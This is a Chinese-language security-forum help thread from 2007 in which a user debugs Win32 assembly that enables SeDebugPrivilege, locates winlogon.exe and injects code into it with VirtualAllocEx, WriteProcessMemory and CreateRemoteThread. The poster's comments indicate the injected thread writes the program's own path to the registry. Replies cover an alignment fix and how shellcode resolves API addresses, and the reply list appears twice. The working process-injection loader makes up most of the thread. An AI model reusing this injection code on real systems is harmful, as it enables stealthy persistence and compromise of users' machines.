[求助]Win32ASM在变量定义的时候出现的奇怪问题===已解决-编程技术-看雪-安全社区|安全招聘|kanxue.com

[求助]Win32ASM在变量定义的时候出现的奇怪问题===已解决

发表于: 2007-10-19 22:38 9074

[求助]Win32ASM在变量定义的时候出现的奇怪问题===已解决

壹只老虎

2007-10-19 22:38

9074

.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
;include th32.inc
includelib kernel32.lib
includelib user32.lib
includelib advapi32.lib
includelib th32.lib
.data?
lpGetProcAddress dd ?;需要被写入远程线程的函数
lpGetModuleHandle dd ?
lplstrlen dd ?
lpSleep dd ?
lpFileName db 256 dup (?);写入远程线程的自身文件名，用于写入注册表
lpRemoteCode dd ?;远程线程开辟空间的起始地址
hModule dd ?
dwWinlogon dd ?;winlogon进程号
dwTemp dd ?
.const
szKernelDll db 'kernel32.dll',0
szGetProcAddress db 'GetProcAddress',0
szGetModuleHandle db 'GetModuleHandleA',0
szlstrlen db 'lstrlenA',0
szSleep db 'Sleep',0
szErrOpen db 'Can not open thread',0ah,0dh,0
szDebugName db 'SeDebugPrivilege',0
szWinlogonName db 'winlogon.exe',0
.code
include RemoteThread.asm
start:

jmp @F
hToken dd ?
hProcess dd ?
hToolHelp dd ?
stTkp TOKEN_PRIVILEGES <>;调整权限
stProcess PROCESSENTRY32 <>;查找winlogon进程
@@:

;*************************************************************************
;调整当前进程的权限，设置成调试权限，才能打开winlogon
invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,NULL,offset szDebugName,addr stTkp.Privileges[0].Luid
mov stTkp.PrivilegeCount,1
mov stTkp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,FALSE,addr stTkp,NULL,NULL,NULL
;***************************************************************************
;查找winlogon的进程号
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,NULL
mov hToolHelp,eax
mov stProcess.dwSize,sizeof stProcess
invoke Process32First,hToolHelp,addr stProcess
mov ebx,eax
.while ebx==TRUE
mov stProcess.dwSize,sizeof stProcess
invoke Process32Next,hToolHelp,addr stProcess
lea edx,stProcess.szExeFile
invoke lstrcmp,edx,offset szWinlogonName
.if eax==0
push stProcess.th32ProcessID
pop dwWinlogon
.break
.endif
.endw
;***************************************************************************
;打开winlogon进程
;开辟空间
;写入进程数据

invoke OpenProcess,PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_CREATE_THREAD,FALSE,dwWinlogon
.if eax
mov hProcess,eax
invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
.if eax
mov lpRemoteCode,eax
invoke WriteProcessMemory,hProcess,lpRemoteCode,offset REMOTE_CODE_START, REMOTE_CODE_LENGTH,addr dwTemp
invoke lstrlen,offset lpFileName
add eax,sizeof dword*4
invoke WriteProcessMemory,hProcess,lpRemoteCode,offset lpGetProcAddress, eax,addr dwTemp
mov eax,lpRemoteCode
add eax,offset _RemoteThread-offset REMOTE_CODE_START
invoke CreateRemoteThread,hProcess,NULL,NULL,eax,0,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,offset szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
end start

;以上代码提权失败!AdjustTokenPrivileges返回0

;*************************************************************************************/
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
;include th32.inc
includelib kernel32.lib
includelib user32.lib
includelib advapi32.lib
includelib th32.lib
.data?
lpGetProcAddress dd ?;需要被写入远程线程的函数
lpGetModuleHandle dd ?
lplstrlen dd ?
lpSleep dd ?
lpFileName db 256 dup (?);写入远程线程的自身文件名，用于写入注册表
lpRemoteCode dd ?;远程线程开辟空间的起始地址
hModule dd ?

hToken dd ?
hProcess dd ?
hToolHelp dd ?
stTkp TOKEN_PRIVILEGES <>;调整权限
stProcess PROCESSENTRY32 <>;查找winlogon进程

dwWinlogon dd ?;winlogon进程号
dwTemp dd ?
.const
szKernelDll db 'kernel32.dll',0
szGetProcAddress db 'GetProcAddress',0
szGetModuleHandle db 'GetModuleHandleA',0
szlstrlen db 'lstrlenA',0
szSleep db 'Sleep',0
szErrOpen db 'Can not open thread',0ah,0dh,0
szDebugName db 'SeDebugPrivilege',0
szWinlogonName db 'winlogon.exe',0
.code
include RemoteThread.asm
start:

;*************************************************************************
;调整当前进程的权限，设置成调试权限，才能打开winlogon
invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,NULL,offset szDebugName,addr stTkp.Privileges[0].Luid
mov stTkp.PrivilegeCount,1
mov stTkp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,FALSE,addr stTkp,NULL,NULL,NULL
;***************************************************************************
;查找winlogon的进程号
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,NULL
mov hToolHelp,eax
mov stProcess.dwSize,sizeof stProcess
invoke Process32First,hToolHelp,addr stProcess
mov ebx,eax
.while ebx==TRUE
mov stProcess.dwSize,sizeof stProcess
invoke Process32Next,hToolHelp,addr stProcess
lea edx,stProcess.szExeFile
invoke lstrcmp,edx,offset szWinlogonName
.if eax==0
push stProcess.th32ProcessID
pop dwWinlogon
.break
.endif
.endw
;***************************************************************************
;打开winlogon进程
;开辟空间
;写入进程数据

invoke OpenProcess,PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_CREATE_THREAD,FALSE,dwWinlogon
.if eax
mov hProcess,eax
invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
.if eax
mov lpRemoteCode,eax
invoke WriteProcessMemory,hProcess,lpRemoteCode,offset REMOTE_CODE_START, REMOTE_CODE_LENGTH,addr dwTemp
invoke lstrlen,offset lpFileName
add eax,sizeof dword*4
invoke WriteProcessMemory,hProcess,lpRemoteCode,offset lpGetProcAddress, eax,addr dwTemp
mov eax,lpRemoteCode
add eax,offset _RemoteThread-offset REMOTE_CODE_START
invoke CreateRemoteThread,hProcess,NULL,NULL,eax,0,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,offset szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
end start

;以上代码提权成功!AdjustTokenPrivileges返回1

这两段代码,除了红色部分的位置不同,其他全部一样,
如果把那几个变量定义在数据段,没问题,成功了
可是如果把那几个变量定义在代码段,编译后把代码节的属性修改为E0000020,
那么提权就失败了!
更奇怪的是,传入AdjustTokenPrivileges的参数是相同的,地址里的内容也是相同的.
但结果就是不一样,不知道为什么,请各位指点下,先谢谢了!

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

Main_失败.rar （1.25kb，6次下载）
Main_失败源代码.rar （2.05kb，5次下载）
Main_成功.rar （1.18kb，5次下载）
Main_成功源代码.rar （2.04kb，11次下载）

收藏・0

免费・1

支持

最新回复 (12)
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 2 楼 align dword stTkp TOKEN_PRIVILEGES <>;调整权限 stProcess PROCESSENTRY32 <>;查找winlogon进程原来是对齐问题! 2007-10-19 23:23 0
zjjmjtoot 雪币： 299 活跃值： (25) 能力值： ( LV10，RANK：170 ) 在线值：发帖 13 回帖 159 粉丝 0 关注私信	zjjmjtoot 4 3 楼你娃一天就不干好事，注入winlogo想要做啥子嘛？？？ 2007-10-20 10:36 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 4 楼自言自语还在瞢... shellcode的一般次序： kernel32.dll 的基址-->GetProcAddress-->LoadLibrary-->要用的API-->完成某功能。 XP SP2 以后的版本很难获取kernel32.dll 的基址。 2007-10-20 14:16 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 5 楼为什么阿？我这里还算正常哈！ call/pop/sub组合 2007-10-21 19:49 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 6 楼老师让做的，！ zjjmjtoot：老乡啊！ 2007-10-21 19:49 0
paradise 雪币： 229 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 121 粉丝 0 关注私信	paradise 7 楼是什么对齐还不明白能说清楚点吗 2007-10-23 12:24 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 8 楼我这里还算正常哈！奇怪！ call/pop/sub组合只能定位SHELLCODE（变量、代码...）不能定位在SHELLCODE中要用到的API地址。 2007-10-23 14:12 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 9 楼也是重庆呀，我还以为是我老乡呢 2007-10-23 14:50 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 10 楼 [QUOTE=sixL;373928]奇怪！只能定位SHELLCODE（变量、代码...）不能定位在SHELLCODE中要用到的API地址。[/QUOTE] 嘿嘿让他自己去获取哈! 2007-10-24 12:00 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 11 楼你是哪点的? 2007-10-24 12:00 0
zjjmjtoot 雪币： 299 活跃值： (25) 能力值： ( LV10，RANK：170 ) 在线值：发帖 13 回帖 159 粉丝 0 关注私信	zjjmjtoot 4 13 楼如果只编应用程序的话，了解API，比8086汇编还简单。 2007-10-24 14:32 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 14 楼自罚三杯先 2007-10-24 15:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

壹只老虎

发帖

709

回帖

290

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (12)
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 2 楼 align dword stTkp TOKEN_PRIVILEGES <>;调整权限 stProcess PROCESSENTRY32 <>;查找winlogon进程原来是对齐问题! 2007-10-19 23:23 0
zjjmjtoot 雪币： 299 活跃值： (25) 能力值： ( LV10，RANK：170 ) 在线值：发帖 13 回帖 159 粉丝 0 关注私信	zjjmjtoot 4 3 楼你娃一天就不干好事，注入winlogo想要做啥子嘛？？？ 2007-10-20 10:36 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 4 楼自言自语还在瞢... shellcode的一般次序： kernel32.dll 的基址-->GetProcAddress-->LoadLibrary-->要用的API-->完成某功能。 XP SP2 以后的版本很难获取kernel32.dll 的基址。 2007-10-20 14:16 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 5 楼为什么阿？我这里还算正常哈！ call/pop/sub组合 2007-10-21 19:49 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 6 楼老师让做的，！ zjjmjtoot：老乡啊！ 2007-10-21 19:49 0
paradise 雪币： 229 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 121 粉丝 0 关注私信	paradise 7 楼是什么对齐还不明白能说清楚点吗 2007-10-23 12:24 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 8 楼我这里还算正常哈！奇怪！ call/pop/sub组合只能定位SHELLCODE（变量、代码...）不能定位在SHELLCODE中要用到的API地址。 2007-10-23 14:12 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 9 楼也是重庆呀，我还以为是我老乡呢 2007-10-23 14:50 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 10 楼 [QUOTE=sixL;373928]奇怪！只能定位SHELLCODE（变量、代码...）不能定位在SHELLCODE中要用到的API地址。[/QUOTE] 嘿嘿让他自己去获取哈! 2007-10-24 12:00 0
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 709 粉丝 3 关注私信	壹只老虎 7 11 楼你是哪点的? 2007-10-24 12:00 0
zjjmjtoot 雪币： 299 活跃值： (25) 能力值： ( LV10，RANK：170 ) 在线值：发帖 13 回帖 159 粉丝 0 关注私信	zjjmjtoot 4 13 楼如果只编应用程序的话，了解API，比8086汇编还简单。 2007-10-24 14:32 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 14 楼自罚三杯先 2007-10-24 15:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复